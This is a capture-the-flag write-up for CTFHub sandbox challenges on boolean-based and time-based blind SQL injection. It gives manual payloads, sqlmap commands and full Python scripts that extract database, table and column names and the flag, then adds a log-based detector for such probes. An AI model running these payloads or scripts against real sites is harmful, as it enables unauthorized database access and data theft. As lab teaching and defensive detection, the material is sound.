Boolean-based blind injection
length(): returns the length of a string.
substr(): extracts part of a string; it takes three arguments: the string to cut from, the (1-based) position of the first character to take, and how many characters to take.
ascii(): returns the ASCII code of a character.
Entering 1 and 1=1 echoes query_success, meaning the query succeeded.
Entering 1 and 1=2 echoes query_error: whenever the query returns no rows, or the statement itself fails, the page echoes error. That single bit of feedback is the oracle the rest of this section relies on.
Manual injection
1. First, determine the length of the database name
?id=1 and length(database())>5   # query_error
?id=1 and length(database())=4   # query_success
So the database name is 4 characters long.
2. Next, recover the database name
Manual injection combined with brute-forcing in Burp Suite (Intruder).
The results are as follows:
?id=1 and ascii(substr(database(),1,1))=115
?id=1 and ascii(substr(database(),2,1))=113
?id=1 and ascii(substr(database(),3,1))=108
?id=1 and ascii(substr(database(),4,1))=105
The database name is sqli.
3. Determine the number of tables in the database
?id=1 and (select count(table_name) from information_schema.tables where table_schema=database())=2
The database contains two tables.
4. Determine the table names
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=110
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=101
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=119
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=115
The first table is named news.
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=108
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))=97
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))=103
The second table is named flag.
5. Determine the column names in the flag table
?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))=102
?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),2,1))=108
?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),3,1))=97
?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),4,1))=103
The column name is flag.
sqlmap injection
Enumerate the database name:
python2 sqlmap.py -u http://challenge-6ba08b6de5cbeb61.sandbox.ctfhub.com:10080/?id=1 --dbs
This gives the database name sqli.
Next, enumerate the tables:
python2 sqlmap.py -u http://challenge-6ba08b6de5cbeb61.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables
This gives the table name flag.
Enumerate the columns:
python2 sqlmap.py -u http://challenge-6ba08b6de5cbeb61.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns
The flag table has a single column called flag.
Dump the values:
python2 sqlmap.py -u http://challenge-6ba08b6de5cbeb61.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump
This gives the flag.
Python script injection
Enumerate the database name
import requests
import string

dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
url = 'http://challenge-515a9cc2ebf89df3.sandbox.ctfhub.com:10800/'
length = 4
name = ''
for j in range(1, length + 1):
    for i in dic:
        # true branch returns 1 (query_success); the false branch is a subquery
        # that returns many rows, so the statement fails (query_error)
        payload = 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (j, i)
        # send id as a query parameter so characters such as #, & and % are
        # URL-encoded instead of breaking the request
        r = requests.get(url, params={'id': payload})
        if 'query_success' in r.text:
            name = name + i
            print(name)
            break
print('database_name:', name)
This gives the database name sqli:
s
sq
sql
sqli
database_name: sqli
Enumerate the tables
import requests
import string

dic = string.digits + string.ascii_letters
url = 'http://challenge-515a9cc2ebf89df3.sandbox.ctfhub.com:10800/'
tables = []
for k in range(0, 4):          # try the first four rows of information_schema.tables
    name = ''
    for j in range(1, 9):      # up to eight characters per table name
        for i in dic:
            payload = 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (k, j, i)
            r = requests.get(url, params={'id': payload})
            if 'query_success' in r.text:
                name = name + i
                break
    tables.append(name)
print('table_name:', tables)
Two tables, news and flag:
table_name: ['news', 'flag', '', '']
Enumerate the columns
import requests
import string

url = 'http://challenge-515a9cc2ebf89df3.sandbox.ctfhub.com:10800/'
dic = string.digits + string.ascii_letters
columns = []
for k in range(0, 3):          # try the first three rows of information_schema.columns
    name = ''
    for j in range(1, 9):      # up to eight characters per column name
        for i in dic:
            payload = 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (k, j, i)
            r = requests.get(url, params={'id': payload})
            if 'query_success' in r.text:
                name = name + i
                break
    columns.append(name)
print('column_name:', columns)
The column name is flag:
column_name: ['flag', '', '']
Dump the value
import requests

url = 'http://challenge-515a9cc2ebf89df3.sandbox.ctfhub.com:10800/'
name = ''
for j in range(1, 50):
    for i in range(48, 126):   # printable ASCII, enough for ctfhub{...} flags
        payload = 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (j, i)
        r = requests.get(url, params={'id': payload})
        if 'query_success' in r.text:
            name = name + chr(i)
            print(name)
            break
    else:
        # no character matched: we are past the end of the value, so stop
        break
print('flag:', name)
This gives the flag:
ctfhub{8ce1bf6d1763687b88a521eb}
Time-based blind injection
Entering an arbitrary 1 returns nothing at all; the page gives no feedback, so the only signal left is response time.
Manual injection
1. Use a time delay to measure the length of the database name
?id=1 and if(length(database())=4,sleep(3),1)
The response is delayed, so the database name is 4 characters long.
2. Recover the database name
?id=1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)
?id=1 and if(ascii(substr(database(),2,1))=113,sleep(3),1)
?id=1 and if(ascii(substr(database(),3,1))=108,sleep(3),1)
?id=1 and if(ascii(substr(database(),4,1))=105,sleep(3),1)
Looking up the ASCII codes gives the database name sqli.
3. Count the tables
?id=1 and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(3),1)
So the database has two tables.
4. Recover the table names
?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=110,sleep(3),1)
?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=101,sleep(3),1)
?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=119,sleep(3),1)
?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=115,sleep(3),1)
So the first table is named news.
?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102,sleep(3),1)
?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=108,sleep(3),1)
?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))=97,sleep(3),1)
?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))=103,sleep(3),1)
So the second table is named flag.
5. Count the columns in the flag table
?id=1 and if((select count(column_name) from information_schema.columns where table_name='flag')=1,sleep(3),1)
There is one column.
6. Recover the column name
?id=1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))=102,sleep(3),1)
?id=1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),2,1))=108,sleep(3),1)
?id=1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),3,1))=97,sleep(3),1)
?id=1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),4,1))=103,sleep(3),1)
So the column name is flag.
Script injection
Enumerate the database name
import requests
import string
import time

url = 'http://challenge-ada0507efb92b9a6.sandbox.ctfhub.com:10800/'
name = ''
for i in range(1, 5):
    for j in string.ascii_letters:
        payload = 'if(substr(database(),%d,1)="%s",sleep(3),1)' % (i, j)
        time_start = time.time()
        r = requests.get(url, params={'id': payload})
        time_end = time.time()
        # a correct guess makes the server sleep 3 s; anything over 2 s counts
        if time_end - time_start > 2:
            name += j
            break
    print(name)
print('database_name:', name)
Output:
s
sq
sql
sqli
database_name: sqli
Enumerate the tables
import requests
import string
import time

url = 'http://challenge-ada0507efb92b9a6.sandbox.ctfhub.com:10800/'
tables = []
for i in range(0, 2):          # the two tables counted above
    name = ''
    for j in range(1, 9):      # up to eight characters per table name
        for k in string.ascii_letters:
            payload = 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
            time_start = time.time()
            r = requests.get(url, params={'id': payload})
            time_end = time.time()
            if time_end - time_start > 2:   # the delay fired, so the guess is right
                name += k
                break
    tables.append(name)
print('table_name:', tables)
Output:
table_name: ['news', 'flag']
Enumerate the columns
import requests
import string
import time

url = 'http://challenge-ada0507efb92b9a6.sandbox.ctfhub.com:10800/'
columns = []
for i in range(0, 1):          # the single column counted above
    name = ''
    for j in range(1, 9):      # up to eight characters per column name
        for k in string.ascii_letters:
            payload = 'if(substr((select column_name from information_schema.columns where table_name="flag" limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
            time_start = time.time()
            r = requests.get(url, params={'id': payload})
            time_end = time.time()
            if time_end - time_start > 2:   # the delay fired, so the guess is right
                name += k
                break
    columns.append(name)
print('column_name:', columns)
Output:
column_name: ['flag']
Dump the value
import requests
import time

url = 'http://challenge-ada0507efb92b9a6.sandbox.ctfhub.com:10800/'
name = ''
for i in range(1, 50):
    for j in range(48, 126):   # printable ASCII, enough for ctfhub{...} flags
        payload = 'if(ascii(substr((select flag from flag),%d,1))=%d,sleep(3),1)' % (i, j)
        # one request per guess, timed end to end; every extra request would
        # add another 3 s delay on each correct guess
        time_start = time.time()
        r = requests.get(url, params={'id': payload})
        time_end = time.time()
        if time_end - time_start > 2:
            name += chr(j)
            print(name)
            break
    else:
        break   # no character matched: end of the value
print('data:', name)
It is painfully slow, but eventually the flag comes out.
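Seen from the server side, both the boolean and the time-based scripts above leave the same footprint: one client sending hundreds of near-identical requests whose id parameter wraps length()/substr()/ascii() around information_schema lookups or calls sleep(). The following added example (not part of the original write-up) flags that pattern in web-server access logs; it assumes Common Log Format with a trailing response-time field in seconds, and the log lines are constructed samples modelled on the probes in this page.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Fragments characteristic of the probes shown above: boolean probes wrap
# length()/substr()/ascii() around information_schema lookups, time-based
# probes add sleep(), and the first test is usually a tautology like "and 1=1".
SIGNATURES = [
    ("information_schema", re.compile(r"information_schema", re.I)),
    ("string-probe", re.compile(r"\b(substr|ascii|length)\s*\(", re.I)),
    ("sleep", re.compile(r"\bsleep\s*\(", re.I)),
    ("tautology", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
]

# Assumed log layout: Common Log Format plus a trailing response-time field
# in seconds (as nginx's $request_time gives). Adjust the regex for other formats.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+)'
                    r' [^"]*" (?P<status>\d{3}) \S+ (?P<rt>[\d.]+)$')

def classify_request(url, response_time, slow_threshold=2.0):
    """Return the set of indicator names hit by one request (empty if clean)."""
    decoded = unquote_plus(url)
    hits = {name for name, pat in SIGNATURES if pat.search(decoded)}
    # A sleep() payload whose response really was slow confirms the delay fired.
    if "sleep" in hits and response_time >= slow_threshold:
        hits.add("time-delay-observed")
    return hits

def detect_blind_sqli(log_lines, min_probes=3):
    """Group flagged requests by client IP and report clients with enough probes."""
    # Blind injection needs many near-identical requests, so the count per
    # client, not any single request, is the strongest signal.
    probes = defaultdict(list)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m["url"], float(m["rt"]))
        if hits:
            probes[m["ip"]].append((unquote_plus(m["url"]), sorted(hits)))
    return {ip: reqs for ip, reqs in probes.items() if len(reqs) >= min_probes}

# Constructed sample lines (not real traffic) modelled on the probes above.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /?id=1 HTTP/1.1" 200 512 0.012',
    '203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /?id=1%20and%20length(database())%3E5 HTTP/1.1" 200 498 0.011',
    '203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /?id=1%20and%20ascii(substr(database(),1,1))%3D115 HTTP/1.1" 200 512 0.013',
    '203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "GET /?id=1%20and%20if(length(database())%3D4,sleep(3),1) HTTP/1.1" 200 512 3.021',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /?id=2 HTTP/1.1" 200 520 0.010',
]
```

Running detect_blind_sqli(SAMPLE_LOG) reports only 203.0.113.5, with three flagged requests; a real deployment would feed it the live access log and alert or rate-limit on the flagged client.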